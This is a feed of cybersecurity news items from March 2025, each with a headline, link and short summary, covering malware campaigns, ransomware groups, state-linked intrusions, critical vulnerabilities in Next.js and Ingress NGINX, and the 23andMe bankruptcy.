    Security expert Troy Hunt hit by phishing attack

    financial
    2025-03-26 https://www.malwarebytes.com/blog/news/2025/03/security-expert-troy-hunt-hit-by-phishing-attack
    Troy Hunt, security expert and Have I Been Pwned owner, disclosed a phishing attack against him in a commendable display of transparency.

    Autosummary: The stolen records included email addresses, subscription statuses, and IP addresses, along with latitude and longitude data, which, as Hunt later learned, “do not pinpoint the location of the subscriber.” And, importantly, as the owner of the website Have I Been Pwned (HIBP), which helps people search whether they’ve been involved in a data breach, Hunt had one more data breach to add to the website’s collection: His own.


    New ReaderUpdate malware variants target macOS users

    exploits
    2025-03-26 https://securityaffairs.com/175891/malware/readerupdate-malware-variants-targets-macos.html
    New ReaderUpdate malware variants, now written in Crystal, Nim, Rust, and Go, target macOS users, SentinelOne warns. SentinelOne researchers warn that multiple versions of the ReaderUpdate malware, written in the Crystal, Nim, Rust, and Go programming languages, are targeting macOS users. ReaderUpdate is a macOS malware loader that has been active since 2020; the malicious code […]

    Autosummary: Pierluigi Paganini, March 26, 2025. New ReaderUpdate malware variants, now written in Crystal, Nim, Rust, and Go, target macOS users, SentinelOne warns.


    Spring clean your security data: The case for cybersecurity data hygiene

    ciber
    2025-03-25 https://www.helpnetsecurity.com/2025/03/25/security-data-hygiene/

    Spring cleaning isn’t just for your closets; security teams should take the same approach to their security operations data, where years of unchecked log growth have created a bloated, inefficient and costly mess. The modern Security Operations Center (SOC) is drowning in security telemetry from endpoints, cloud, SaaS applications, identity platforms and a growing list of other sources. In practice, most of these are redundant, irrelevant, or just outright noise, and are affecting detection effectiveness, … More

    The post Spring clean your security data: The case for cybersecurity data hygiene appeared first on Help Net Security.


    Autosummary: Instead, security teams should focus on curation, contextualization, and value efficiency and forward only what matters when it matters, enriching it effectively, and storing everything where it makes the most sense. In practice, most of these are redundant, irrelevant, or just outright noise, and are affecting detection effectiveness, operational efficiency, and the ability to extract real insights. Stop DIYing security data management: for years, security teams had little choice but to repurpose log management tools, custom scripts, and DIY approaches to make sense of security telemetry. Instead, lean-forward teams should be leveraging a variety of techniques – including machine learning, vector analysis, knowledge graphs and LLMs – to automate event transformation, refinement, and prioritization.


    Cybersecurity jobs available right now: March 25, 2025

    ciber
    2025-03-25 https://www.helpnetsecurity.com/2025/03/25/cybersecurity-jobs-available-right-now-march-25-2025/

    Analyst – Cyber Threat Intelligence, Adecco | UAE | On-site. As an Analyst – Cyber Threat Intelligence, you will conduct threat hunting missions across multi-cloud environments and perform cyber forensics to analyze security incidents. You will also engage in offensive security assessments, participate in red teaming, and support incident response efforts to mitigate breaches. Application and Product Security Senior Analyst (Penetration Testing), Vertiv | USA | On-site … More

    The post Cybersecurity jobs available right now: March 25, 2025 appeared first on Help Net Security.


    Autosummary: Information Security Engineer II (Network Security), First Citizens | India | On-site. As an Information Security Engineer II (Network Security), you will be responsible for analyzing, designing, installing, configuring, maintaining, and repairing network security infrastructure and application components. Network & Cloud Security Specialist, Sagen | Canada | Hybrid. As a Network & Cloud Security Specialist, you will execute the deployment of security controls for Sagen’s networks and network access including all associated VPN, firewalls, intrusion detection and prevention systems, web application firewalls, and cloud access controls. Senior Security Consultant – Offensive Security, Stratascale | USA | Remote. As a Senior Security Consultant – Offensive Security, you will perform penetration testing against complex environments covering external, internal, web application, and other forms of offensive security engagements. Cyber Security Architect, Varonis | Israel | Hybrid. As a Cyber Security Architect, you will be responsible for designing, developing, and implementing security solutions to protect Varonis’ infrastructure, applications, and data from cyber threats.


    Hackers Use .NET MAUI to Target Indian and Chinese Users with Fake Banking, Social Apps

    financial
    2025-03-25 https://thehackernews.com/2025/03/hackers-use-net-maui-to-target-indian.html
    Cybersecurity researchers are calling attention to an Android malware campaign that leverages Microsoft's .NET Multi-platform App UI (.NET MAUI) framework to create bogus banking and social media apps targeting Indian and Chinese-speaking users. "These threats disguise themselves as legitimate apps, targeting users to steal sensitive information," McAfee Labs researcher Dexter Shin said. .NET

    Autosummary: 私密相册 (pBOnCi.cUVNXz), X•GDN (pgkhe9.ckJo4P), 迷城 (pCDhCg.cEOngl), 小宇宙 (p9Z2Ej.cplkQv), X (pDxAtR.c9C6j7), 迷城 (pg92Li.cdbrQ7), 依恋 (pZQA70.cFzO30), 慢夜 (pAQPSN.CcF9N3), indus credit card (indus.credit.card), Indusind Card (com.rewardz.card). There is no evidence that these apps are distributed to Google Play.


    Astral Foods, South Africa’s largest poultry producer, lost over $1M due to a cyberattack

    ciber
    2025-03-25 https://securityaffairs.com/175833/security/astral-foods-cyber-attack.html
    Astral Foods, South Africa’s largest poultry producer, lost over $1M due to a cyberattack disrupting deliveries and impacting operations. Astral Foods is a South African integrated poultry producer and one of the country’s largest food companies. It specializes in poultry production, animal feed, and related agricultural operations. The company supplies chicken products to retail, wholesale, […]

    Autosummary: Pierluigi Paganini, March 25, 2025. Astral Foods, South Africa’s largest poultry producer, lost over $1M due to a cyberattack disrupting deliveries and impacting operations.


    A cyberattack hits Ukraine’s national railway operator Ukrzaliznytsia

    ciber
    2025-03-25 https://securityaffairs.com/175810/hacking/cyberattack-hit-ukraines-national-railway-operator.html
    A cyberattack on Ukraine’s national railway operator Ukrzaliznytsia disrupted online ticket services, causing long lines at Kyiv’s station. The Record Media first reported the news of a cyber attack on Ukraine’s national railway operator Ukrzaliznytsia that disrupted online ticket services, causing long lines at Kyiv’s station. The incident led to overcrowding and long delays as […]

    Autosummary: Pierluigi Paganini, March 25, 2025. A cyberattack on Ukraine’s national railway operator Ukrzaliznytsia disrupted online ticket services, causing long lines at Kyiv’s station.


    APT and financial attacks on industrial organizations in Q4 2024

    financial industry
    2025-03-25 https://ics-cert.kaspersky.com/publications/apt-and-financial-attacks-on-industrial-organizations-in-q4-2024/
    Abuse of Telegram to spy on and put pressure on their victims’ employees, notifying the victims by printing messages on printers connected to a compromised network – we publish interesting details of attacks on industrial enterprises disclosed this quarter.

    Autosummary: According to Trend Micro, Salt Typhoon targeted telecom, government, technology, consulting, chemical and transportation companies in Afghanistan, Brazil, Eswatini, India, Indonesia, Malaysia, Pakistan, the Philippines, South Africa, Taiwan, Thailand, U.S. and Vietnam. Middle East-related activity: CISA alert on Iranian cyber actors. The Federal Bureau of Investigation (FBI), Cybersecurity and Infrastructure Security Agency (CISA), National Security Agency (NSA), Communications Security Establishment Canada (CSE), Australian Federal Police (AFP) and Australian Signals Directorate’s Australian Cyber Security Centre (ASD’s ACSC) released a joint cybersecurity advisory regarding Iranian cyber actors that have been actively targeting organizations across various critical infrastructure sectors, including healthcare, public health, government, IT, engineering and energy, since October 2023. In total, eight modules were discovered, with targets from Bangladesh, Djibouti, Jordan, Malaysia, the Maldives, Myanmar, Nepal, Pakistan, Saudi Arabia, Sri Lanka, Turkey and the United Arab Emirates. Interlock ransomware samples have been spotted in India, Italy, Japan, Germany, Peru, South Korea, Turkey and the U.S., and victims have been found in the education, finance, government, healthcare, and manufacturing sectors. Additionally, the attackers exploited the following vulnerabilities: Atlassian Confluence RCE vulnerabilities (CVE-2023-22515, CVE-2023-22518), Zimbra vulnerability chain (CVE-2019-9670, CVE-2019-9621), MS Exchange vulnerability chain (CVE-2021-34473, CVE-2021-34523, CVE-2021-31207) and JetBrains TeamCity RCE vulnerability (CVE-2024-27198).
Attacks by Akira/Howling Scorpius targeting medium-size organizations in various sectors, including construction, transportation and logistics, government, telecommunications, technology and pharmaceuticals, bypassed cybersecurity solutions through a mix of well-known techniques, such as Bring Your Own Vulnerable Driver, and a new one targeting virtualized infrastructures protected with EDR solutions. The new Interlock ransomware, which has a version tailored for this OS, has been observed targeting industrial enterprises in India, Italy, Japan, Germany, Peru, South Korea, Turkey, and the United States. Initial access is achieved by exploiting vulnerable public endpoints using CVE-2023-46805, CVE-2024-21887 (Ivanti Connect VPN service), CVE-2023-48788 (FortiClient EMS), CVE-2022-3236 (Sophos firewall), CVE-2021-26855, CVE-2021-26857-6858 and CVE-2021-27065 (ProxyLogon). The attacks associated with all four group names (Shadow, Twelve, Comet, DARKSTAR) involved use of the same tools, like Cobint, gpo.ps1, similar strings in Windows tasks created for running malware, and ngrok as one of the backup channels for the access and execution of other malicious actions. Operation Cobalt Whisper: SEQRITE Labs’ APT team has revealed an advanced cyber-espionage campaign known as Operation Cobalt Whisper, impacting multiple industries including defense, education, environmental engineering, electrotechnical engineering, energy, cybersecurity, aviation and healthcare in Hong Kong and Pakistan. In addition to GHOSTSPIDER, Salt Typhoon uses a set of proprietary and shared tools for complex multi-stage attacks: SNAPPYBEE (aka Deed RAT), SparrowDoor, CrowDoor and MASOL RAT for Linux, the DEMODEX rootkit, NeoReGeorg, frpc, and Cobalt Strike. According to Kaspersky telemetry, the threat actor has been active in Russia, Belarus, Kazakhstan, Kyrgyzstan, Moldova, Slovakia, and Turkey.
When targeting defence, energy, governmental, pharmaceutical, insurance and legal sectors in Europe, Ukraine and the U.S. for espionage and cybercrime, RomCom exploited a chain of two zero-day vulnerabilities (one in the browser and one in the OS) that ended up with zero-click remote code execution. Affected industries include education, construction, consulting, transportation and logistics, government, telecommunications, technology and pharmaceuticals, with manufacturing being affected the most. RomCom attacks: ESET researchers have linked Russia-aligned threat actor RomCom (aka Storm-0978, Tropical Scorpius, UNC2596), known for its opportunistic and targeted espionage operations, to a campaign exploiting two zero-day vulnerabilities: one in Mozilla Firefox (CVE-2024-9680) and the other in Microsoft Windows (CVE-2024-49039). The malware supports several plugins that can steal login and FTP credentials, email addresses, cookies, and other information from browsers, Outlook, Thunderbird, FileZilla and WinSCP. The Crypt Ghouls’ other toolset consists of common tools such as Mimikatz, XenAllPasswordPro, PingCastle, Localtonet tool, Resocks, AnyDesk, PsExec and others.


    New Android malware uses Microsoft’s .NET MAUI to evade detection

    exploits
    2025-03-25 https://www.bleepingcomputer.com/news/security/new-android-malware-uses-microsofts-net-maui-to-evade-detection/
    New Android malware campaigns use Microsoft's cross-platform framework .NET MAUI while disguising as legitimate services to evade detection. [...]

    Autosummary: Fake X apps steal data. McAfee discovered several APKs in its report as part of the campaigns using the .NET MAUI technique, including fake banking, communication, dating, and social media apps such as X. Fake X app (Source: McAfee). The researchers used two apps as examples, IndusInd and SNS, which are distributed outside Google Play, Android's official app store.


    The vCISO Academy: Transforming MSPs and MSSPs into cybersecurity powerhouses

    ciber
    2025-03-25 https://www.helpnetsecurity.com/2025/03/25/cynomi-vciso-academy/

    By now, it’s no secret—cyber threats are on the rise, and the need for strong cybersecurity is greater than ever. Globally, small and medium-sized businesses (SMBs) are prime targets for cyberattacks, yet many can’t afford a full-time Chief Information Security Officer (CISO). That’s where the virtual CISO (vCISO) model comes in, offering a cost-effective way for SMBs to get expert security leadership using a flexible model and without the big price tag. For MSPs … More

    The post The vCISO Academy: Transforming MSPs and MSSPs into cybersecurity powerhouses appeared first on Help Net Security.


    Autosummary: Some key highlights of the academy include: expert guidance from industry experts who share their practical knowledge and experience on a wide range of essential vCISO functions, including risk and compliance assessments, cybersecurity strategy development, and effective communication of risks to executive teams. Empowering MSPs and MSSPs to accelerate their vCISO journey: by bridging the knowledge gap and offering structured, accessible learning, the vCISO Academy empowers service providers to broaden their perspective: the vCISO Academy provides a deeper understanding of what it means to be a vCISO with specialized training to address the cybersecurity shortage.


    Chinese Hackers Breach Asian Telecom, Remain Undetected for Over 4 Years

    Telcos
    2025-03-25 https://thehackernews.com/2025/03/chinese-hackers-breach-asian-telecom.html
    A major telecommunications company located in Asia was allegedly breached by Chinese state-sponsored hackers who spent over four years inside its systems, according to a new report from incident response firm Sygnia. The cybersecurity company is tracking the activity under the name Weaver Ant, describing the threat actor as stealthy and highly persistent. The name of the telecom provider was not

    Autosummary: Coinciding with the MSS statement, Chinese cybersecurity firms QiAnXin and Antiy have detailed spear-phishing attacks orchestrated by a Taiwanese threat actor codenamed APT-Q-20 (aka APT-C-01, GreenSpot, Poison Cloud Vine, and White Dolphin) that lead to the delivery of a C++ trojan and command-and-control (C2) frameworks like Cobalt Strike and Sliver.


    Brazil's Supreme Court to decide whether to put Bolsonaro on trial

    latam
    2025-03-25 https://www.bbc.com/news/articles/c5y0nkz2g06o
    Jair Bolsonaro is accused of plotting a coup, but the ex-president says he is the victim of a witch hunt.



    New Windows zero-day leaks NTLM hashes, gets unofficial patch

    exploits
    2025-03-25 https://www.bleepingcomputer.com/news/security/new-windows-zero-day-leaks-ntlm-hashes-gets-unofficial-patch/
    Free unofficial patches are available for a new Windows zero-day vulnerability that can let remote attackers steal NTLM credentials by tricking targets into viewing malicious files in Windows Explorer. [...]

    Autosummary: In recent months, 0patch has reported three other zero-day vulnerabilities that Microsoft patched or has yet to address, including a Windows Theme bug (patched as CVE-2025-21308), a Mark of the Web bypass on Server 2012 (still a zero-day without an official patch), and a URL File NTLM Hash Disclosure Vulnerability (patched as CVE-2025-21377).


    EncryptHub linked to MMC zero-day attacks on Windows systems

    exploits
    2025-03-25 https://www.bleepingcomputer.com/news/security/encrypthub-linked-to-zero-day-attacks-targeting-windows-systems/
    A threat actor known as EncryptHub has been linked to Windows zero-day attacks exploiting a Microsoft Management Console vulnerability patched this month. [...]



    Microsoft’s new AI agents take on phishing, patching, alert fatigue

    financial
    2025-03-25 https://www.helpnetsecurity.com/2025/03/25/microsoft-security-copilot-agents/

    Microsoft is rolling out a new generation of AI agents in Security Copilot, built to help with some of the most time-consuming security challenges, such as phishing, data protection, and identity management. Phishing is still one of the most common — and costly — types of cyberattacks out there. Last year, from January to December 2024, Microsoft spotted over 30 billion phishing emails aimed at customers. The sheer volume is staggering, and it’s more than … More

    The post Microsoft’s new AI agents take on phishing, patching, alert fatigue appeared first on Help Net Security.


    Autosummary: “Purpose-built for security, agents learn from feedback, adapt to workflows, and operate securely—aligned to Microsoft’s Zero Trust framework,” said Vasu Jakkal, Corporate VP, Microsoft Security.


    Q4 2024 – a brief overview of the main incidents in industrial cybersecurity

    industry ciber
    2025-03-25 https://ics-cert.kaspersky.com/publications/q4-2024-a-brief-overview-of-the-main-incidents-in-industrial-cybersecurity/
    In Q4 2024, 107 incidents were publicly confirmed by victims. All of these incidents are included in the table at the end of the overview, with select incidents described in detail. Report at a glance: attacks leading to insolvency. Kreisel | Manufacturing | Denial of operations, insolvency | Ransomware. German bulk material handling company Kreisel GmbH & […]

    Autosummary: Stoli Group | Manufacturing, food and beverage | Denial of operations, denial of IT services, data leakage, bankruptcy | Ransomware. Stoli Group USA and Kentucky Owl, U.S.-based subsidiaries of the Luxembourg-based vodka manufacturer Stoli Group, filed for Chapter 11 bankruptcy on November 29, months after a ransomware attack disrupted their operations. Medion | Manufacturing, electronics | Denial of operations, denial of IT systems, data leakage | Ransomware. German electronic products supplier Medion AG, a subsidiary of Lenovo, a Chinese multinational technology company, became the target of a cyberattack. Countries with the highest number of reported incidents: USA: 81% (87 incidents); Germany: 6% (7 incidents); Japan: 4% (4 incidents). This quarter, we saw incidents in certain countries where we rarely see public confirmation of incidents: Costa Rica, Luxembourg, Latvia, Burkina Faso, and Pakistan. Other major incidents of interest: Microlise | Transportation, logistics | Denial of IT systems, denial of services | Ransomware. Microlise, a British telematics and fleet management solution provider, was affected by the cyberattack known to have disrupted DHL’s store deliveries for the retailer NISA. Biggest impact prevented by responders: TetraSoft | Energy, mining | Denial of operations and services, supply chain / trusted partner. A targeted cyberattack on TetraSoft, a Russian company that provides remote monitoring of hydrocarbon production and drilling, was detected and stopped. According to the company, the threat actors stole a total of 50,694 files from NPCV, including internal documents related to green procurement, health and safety, policies, and transactions, as well as emails from business partners. According to Financial Times, Serco, which handles the transport of prisoners for the Ministry of Justice, has seen vehicle tracking, panic alarms, navigation, and notifications related to estimated arrival times disabled.
Incidents at large organizations: Schneider Electric | Energy, manufacturing | Personal data leakage | Ransomware. On November 4, French energy management and automation solutions company Schneider Electric confirmed a cyberattack involving unauthorized access to one of its internal project execution tracking platforms hosted in an isolated environment following claims by the Grep (Hellcat) group of an incident involving the theft of 40 GB and a ransom demand.


    23andMe bankruptcy: How to delete your data and stay safe from the 2023 breach

    financial
    2025-03-25 https://www.malwarebytes.com/blog/news/2025/03/23andme-bankruptcy-how-to-delete-your-data-and-stay-safe-from-the-2023-breach
    With 23andMe filing for bankruptcy, here's how to remove your data from the company and protect yourself from the 2023 breach.

    Autosummary: Found being sold on the dark web, the data reportedly included “profile and account ID numbers, names, gender, birth year, maternal and paternal genetic markers, ancestral heritage results, and data on whether or not each user has opted into 23AndMe’s health data.” According to the company’s own privacy statement: “If we are involved in a bankruptcy, merger, acquisition, reorganization, or sale of assets, your Personal Information may be accessed, sold or transferred as part of that transaction.”


    Android malware campaigns use .NET MAUI to evade detection

    exploits
    2025-03-25 https://securityaffairs.com/175843/cyber-crime/android-malware-uses-net-maui-to-evade-detection.html
    Researchers warn of a new Android malware that uses .NET MAUI to mimic legit services and evade detection. McAfee researchers warn of Android malware campaigns using .NET MAUI to evade detection. These threats disguise themselves as legitimate services to steal sensitive information from users. .NET MAUI (Multi-platform App UI) is a cross-platform framework by Microsoft […]

    Autosummary: Finally, in the third stage, the decrypted file contains code related to the .NET MAUI framework, which is then loaded to execute the main payload.” continues the report. MAUI-based malware to evade detection through techniques like hidden code blobs, multi-stage loading, encryption, and obfuscation.


    DNA testing site 23andMe files for bankruptcy protection

    financial
    2025-03-24 https://www.bbc.com/news/articles/c9q4r9xy9wro
    The company said that it will now attempt to sell itself under the supervision of a court.


    Critical Next.js Vulnerability Allows Attackers to Bypass Middleware Authorization Checks

    exploits
    2025-03-24 https://thehackernews.com/2025/03/critical-nextjs-vulnerability-allows.html
    A critical security flaw has been disclosed in the Next.js React framework that could be potentially exploited to bypass authorization checks under certain conditions. The vulnerability, tracked as CVE-2025-29927, carries a CVSS score of 9.1 out of 10.0. "Next.js uses an internal header x-middleware-subrequest to prevent recursive requests from triggering infinite loops," Next.js said in an


    FBI warns of malicious free online document converters spreading malware

    exploits
    2025-03-24 https://securityaffairs.com/175764/cyber-crime/malicious-free-online-document-converters.html
    The FBI warns of a significant increase in scams involving free online document converters to infect users with malware. The FBI warns that threat actors use malicious online document converters to steal users’ sensitive information and infect their systems with malware. “The FBI Denver Field Office is warning that agents are increasingly seeing a scam […]

    Autosummary: FBI warns of malicious free online document converters spreading malware. Pierluigi Paganini, March 24, 2025. The FBI warns of a significant increase in scams involving free online document converters to infect users with malware.


    Cloak ransomware group hacked the Virginia Attorney General’s Office

    exploits ransomware
    2025-03-24 https://securityaffairs.com/175751/data-breach/cloak-group-hacked-virginia-attorney-generals-office.html
    The Cloak ransomware group claims responsibility for a cyberattack on the Virginia Attorney General’s Office that occurred in February. The ransomware group Cloak has claimed responsibility for a February cyberattack on the Virginia Attorney General’s Office. A cyberattack on the Virginia Attorney General’s Office forced officials to shut down IT systems, including email and VPN, […]

    Autosummary: The group has extended its operations to countries in Asia and targets various sectors, including healthcare, real estate, construction, IT, food, and manufacturing.”


    Critical Next.js auth bypass vulnerability opens web apps to compromise (CVE-2025-29927)

    exploits
    2025-03-24 https://www.helpnetsecurity.com/2025/03/24/critical-next-js-auth-bypass-vulnerability-opens-web-apps-to-compromise-cve-2025-29927/

    A critical vulnerability (CVE-2025-29927) in the open source Next.js framework can be exploited by attackers to bypass authorization checks and gain unauthorized access to web pages they should not have access to (e.g., the web app’s admin panel). Vercel – the cloud platform-as-a-service company that develops the popular framework – has released security updates fixing it, and has advised users to upgrade as soon as possible. What is Next.js and how does CVE-2025-29927 manifest? Next.js … More

    Autosummary: Next.js uses its own middleware to process requests, protect routes, add security headers to responses, and handle things like user authentication and user redirection (e.g., based on geolocation, their session / authorization cookies, etc.).


    ⚡ THN Weekly Recap: GitHub Supply Chain Attack, AI Malware, BYOVD Tactics, and More

    exploits industry
    2025-03-24 https://thehackernews.com/2025/03/thn-weekly-recap-github-supply-chain.html
    A quiet tweak in a popular open-source tool opened the door to a supply chain breach—what started as a targeted attack quickly spiraled, exposing secrets across countless projects. That wasn’t the only stealth move. A new all-in-one malware is silently stealing passwords, crypto, and control—while hiding in plain sight. And over 300 Android apps joined the chaos, running ad

    Autosummary: This week's list includes — CVE-2025-29927 (Next.js), CVE-2025-23120 (Veeam Backup & Replication), CVE-2024-56346, CVE-2024-56347 (IBM Advanced Interactive eXecutive), CVE-2024-10441 (Synology BeeStation Manager, DiskStation Manager, and Unified Controller), CVE-2025-26909 (WP Ghost), CVE-2023-43650, CVE-2023-43651, CVE-2023-43652, CVE-2023-42818, CVE-2023-46123, CVE-2024-29201, CVE-2024-29202, CVE-2024-40628, CVE-2024-40629 (JumpServer), and CVE-2025-0927 (Linux kernel). 📰 Around the Cyber World Google Releases OSV-Scanner 2 — Google has announced the release of an updated iteration of OSV-Scanner, its free vulnerability scanner for open-source developers. Aquatic Panda Attributed to 2022 Espionage Campaign — The China-aligned Aquatic Panda has been linked to a "global espionage campaign" that took place in 2022 targeting seven organizations in Taiwan, Hungary, Turkey, Thailand, France, and the United States. "However, by the time this occurs, it may be too late, because sensitive information, such as an API token, may have already been transmitted in cleartext in the initial client request." "Connections made over cleartext HTTP ports risk exposing sensitive information because the data is transmitted unencrypted and can be intercepted by network intermediaries, such as ISPs, Wi-Fi hotspot providers, or malicious actors on the same network," it noted. T-Pot is a powerful, all-in-one honeypot platform that bundles 20+ honeypots with built-in dashboards, live attack maps, and threat analysis tools—no commercial license needed. With built-in subdomain discovery, traffic monitoring, and flexible CLI options, it's a powerful free tool for security researchers and red teamers looking to automate smarter, context-aware testing. "During the attack, the threat actor showed a sophisticated ability to overcome security challenges across multiple domains, including macOS malwares, AWS cloud compromise, application security and smart contract security." To that end, organizations are expected to identify cryptographic services needing upgrades and build a migration plan by 2028, execute high-priority upgrades and refine plans as PQC evolves from 2028 to 2031, and complete migration to PQC for all systems, services and products from 2031 to 2035. "The U.K.'s demand of Apple raises a number of serious concerns which directly impact national security and therefore warrant robust public debate," according to a joint letter published by Senators Ron Wyden and Alex Padilla, along with Representatives Andy Biggs, Warren Davidson, and Zoe Lofgren. Unlike traditional scanners, Rogue analyzes each target in real-time, adapting its tests based on responses and generating detailed, easy-to-read reports. Identifying ransomware, data theft, and disinformation as most acute hybrid cybercrime threats, the European police organization said that criminal groups are using cryptocurrency to launder money and move funds around, making their activities harder to detect. Furthermore, third-parties on shared networks could intercept sensitive data from the plaintext HTTP request, or even carry out a Monster-in-the-Middle (MITM) attack by impersonating the web server.


    VSCode Marketplace Removes Two Extensions Deploying Early-Stage Ransomware

    exploits ransomware
    2025-03-24 https://thehackernews.com/2025/03/vscode-marketplace-removes-two.html
    Cybersecurity researchers have uncovered two malicious extensions in the Visual Studio Code (VSCode) Marketplace that are designed to deploy ransomware that's under development to its users. The extensions, named "ahban.shiba" and "ahban.cychelloworld," have since been taken down by the marketplace maintainers. Both the extensions, per ReversingLabs, incorporate code that's designed to invoke a

    Autosummary: Both the extensions, per ReversingLabs, incorporate code that's designed to invoke a PowerShell command, which then grabs a PowerShell-script payload from a command-and-control (C2) server and executes it.


    Attackers can bypass middleware auth checks by exploiting critical Next.js flaw

    exploits
    2025-03-24 https://securityaffairs.com/175775/security/next-js-react-framework-critical-issue.html
    A critical flaw in the Next.js React framework could be exploited to bypass authorization checks under certain conditions. Maintainers of the Next.js React framework addressed a critical vulnerability tracked as CVE-2025-29927 (CVSS score of 9.1) with the release of versions 12.3.5, 13.5.9, 14.2.25, and 15.2.3. “Next.js version 15.2.3 has been released to address a security vulnerability […]


    VanHelsing RaaS Launch: 3 Victims, $5K Entry Fee, Multi-OS, and Double Extortion Tactics

    industry
    2025-03-24 https://thehackernews.com/2025/03/vanhelsing-raas-launch-3-victims-5k.html
    A ransomware-as-a-service (RaaS) operation called VanHelsing has already claimed three victims since it launched on March 7, 2025. "The RaaS model allows a wide range of participants, from experienced hackers to newcomers, to get involved with a $5,000 deposit. Affiliates keep 80% of the ransom payments, while the core operators earn 20%," Check Point said in a report published over the weekend

    Autosummary: The emergence of VanHelsing coincides with a number of developments in the ever-evolving ransomware landscape: the discovery of new versions of Albabat ransomware that go beyond Windows to Linux and macOS, gathering system and hardware information; BlackLock ransomware, a rebranded version of Eldorado, has become one of the most active RaaS groups in 2025, targeting technology, manufacturing, construction, finance, and retail sectors; BlackLock is actively recruiting traffers to drive early stages of ransomware attacks, directing victims to malicious pages that deploy malware capable of establishing initial access to compromised systems; the JavaScript-based malware framework known as SocGholish (aka FakeUpdates) is being used to deliver RansomHub ransomware, an activity attributed to a threat cluster dubbed Water Scylla; the exploitation of security flaws in Fortinet firewall appliances (CVE-2024-55591 and CVE-2025-24472) by a threat actor dubbed Mora_001 since late January 2025 to deliver a newly discovered ransomware strain codenamed SuperBlack, a modified version of LockBit 3.0 that utilizes a custom data exfiltration tool; the Babuk2 (aka Babuk-Bjorka) ransomware group has been observed reusing data from earlier breaches associated with RansomHub, FunkSec, LockBit, and Babuk to issue fake extortion demands to victims. According to statistics compiled by Bitdefender, February 2025 was the worst month for ransomware in history, hitting a record 962 victims, up from 425 victims in February 2024.


    Medusa ransomware uses malicious Windows driver ABYSSWORKER to disable security tools

    exploits ransomware
    2025-03-24 https://securityaffairs.com/175790/security/medusa-ransomware-uses-abyssworker-driver.html
    Medusa ransomware uses a malicious Windows driver ABYSSWORKER to disable security tools, making detection and mitigation more difficult. Elastic Security Labs tracked a financially driven MEDUSA ransomware campaign using a HEARTCRYPT-packed loader and a revoked certificate-signed driver, ABYSSWORKER, to disable EDR tools. The attackers used a 64-bit Windows PE driver named smuol.sys, disguised as a […]

    Autosummary: Medusa ransomware uses malicious Windows driver ABYSSWORKER to disable security tools. Pierluigi Paganini, March 24, 2025. Medusa ransomware uses a malicious Windows driver ABYSSWORKER to disable security tools, making detection and mitigation more difficult.


    23andMe files for bankruptcy, customers advised to delete DNA data

    financial
    2025-03-24 https://www.bleepingcomputer.com/news/security/23andme-files-for-bankruptcy-customers-advised-to-delete-dna-data/
    California-based genetic testing provider 23andMe has filed for Chapter 11 bankruptcy and plans to sell its assets following years of financial struggles. [...]

    Autosummary: This alert also provides detailed steps on how to file these requests, including logging into your account, going into Settings, clicking "View" next to "23andMe Data" (here you also have the option to download your data first), scrolling to "Delete Data," and clicking "Permanently Delete Data."


    New VanHelsing ransomware targets Windows, ARM, ESXi systems

    exploits ransomware
    2025-03-24 https://www.bleepingcomputer.com/news/security/new-vanhelsing-ransomware-targets-windows-arm-esxi-systems/
    A new multi-platform ransomware-as-a-service (RaaS) operation named VanHelsing has emerged, targeting Windows, Linux, BSD, ARM, and ESXi systems. [...]

    Autosummary: The malware supports rich CLI customization to tailor attacks per victim, such as targeting specific drives and folders, restricting the scope of encryption, spreading via SMB, skipping shadow copies deletion, and enabling two-phase stealth mode.


    Cyberattack takes down Ukrainian state railway’s online services

    government ciber
    2025-03-24 https://www.bleepingcomputer.com/news/security/cyberattack-takes-down-ukrainian-state-railways-online-services/
    Ukrzaliznytsia, Ukraine's national railway operator, has been hit by a massive cyberattack that disrupted online services for buying tickets both through mobile apps and the website. [...]

    Autosummary: The incident forced people to booths to buy physical tickets, causing overcrowding, delays, long waiting times, and frustration.


    Chinese Weaver Ant hackers spied on telco network for 4 years

    Telcos
    2025-03-24 https://www.bleepingcomputer.com/news/security/chinese-weaver-ant-hackers-spied-on-telco-network-for-4-years/
    A China-linked advanced threat group named Weaver Ant spent more than four years in the network of a telecommunications services provider, hiding traffic and infrastructure with the help of compromised Zyxel CPE routers. [...]

    Autosummary: As the operation matured, Weaver Ant introduced a more advanced, custom-built web shell known as INMemory, which leverages a DLL (eval.dll) for stealthy ‘just-in-time code execution.’


    Critical Ingress NGINX Controller Vulnerability Allows RCE Without Authentication

    exploits
    2025-03-24 https://thehackernews.com/2025/03/critical-ingress-nginx-controller.html
    A set of five critical security shortcomings have been disclosed in the Ingress NGINX Controller for Kubernetes that could result in unauthenticated remote code execution, putting over 6,500 clusters at immediate risk by exposing the component to the public internet. The vulnerabilities (CVE-2025-24513, CVE-2025-24514, CVE-2025-1097, CVE-2025-1098, and CVE-2025-1974), assigned a CVSS score of

    Autosummary: The shortcomings are listed below - CVE-2025-24514 – auth-url Annotation Injection; CVE-2025-1097 – auth-tls-match-cn Annotation Injection; CVE-2025-1098 – mirror UID Injection; CVE-2025-1974 – NGINX Configuration Code Execution. In an experimental attack scenario, a threat actor could upload a malicious payload in the form of a shared library to the pod by using the client-body buffer feature of NGINX, followed by sending an AdmissionReview request to the admission controller.


    Chinese APT Weaver Ant infiltrated a telco in Asia for over four years

    Telcos
    2025-03-24 https://securityaffairs.com/175800/apt/chinese-apt-weaver-ant-infiltrated-a-telco-for-over-four-years.html
    China-linked APT Weaver Ant infiltrated the network of a telecommunications services provider for over four years. The China-linked threat actor Weaver Ant infiltrated the network of a telecom provider in Asia for over four years. During a forensic investigation, Sygnia researchers observed multiple alerts that revealed a re-enabled threat actor account by a service account […]

    Autosummary: The China Chopper web shell, originally developed by Chinese threat actors, enables remote access and control over compromised web servers, facilitating persistent access, command execution, and data exfiltration. These commands included: ‘Get-DomainUserEvent’, ‘Get-DomainSubnet’, ‘Get-DomainUser’, ‘Get-NetSession’ etc.”


    Week in review: Veeam Backup & Replication RCE fixed, free file converter sites deliver malware

    exploits
    2025-03-23 https://www.helpnetsecurity.com/2025/03/23/week-in-review-veeam-backup-replication-rce-fixed-free-file-converter-sites-deliver-malware/

    Here’s an overview of some of last week’s most interesting news, articles, interviews and videos: Critical Veeam Backup & Replication RCE vulnerability fixed, patch ASAP! (CVE-2025-23120) Veeam has released fixes for a critical remote code execution vulnerability (CVE-2025-23120) affecting its enterprise Veeam Backup & Replication solution, and is urging customers to quickly upgrade to a fixed version. FBI: Free file converter sites and tools deliver malware Malware peddlers are increasingly targeting users who are searching … More

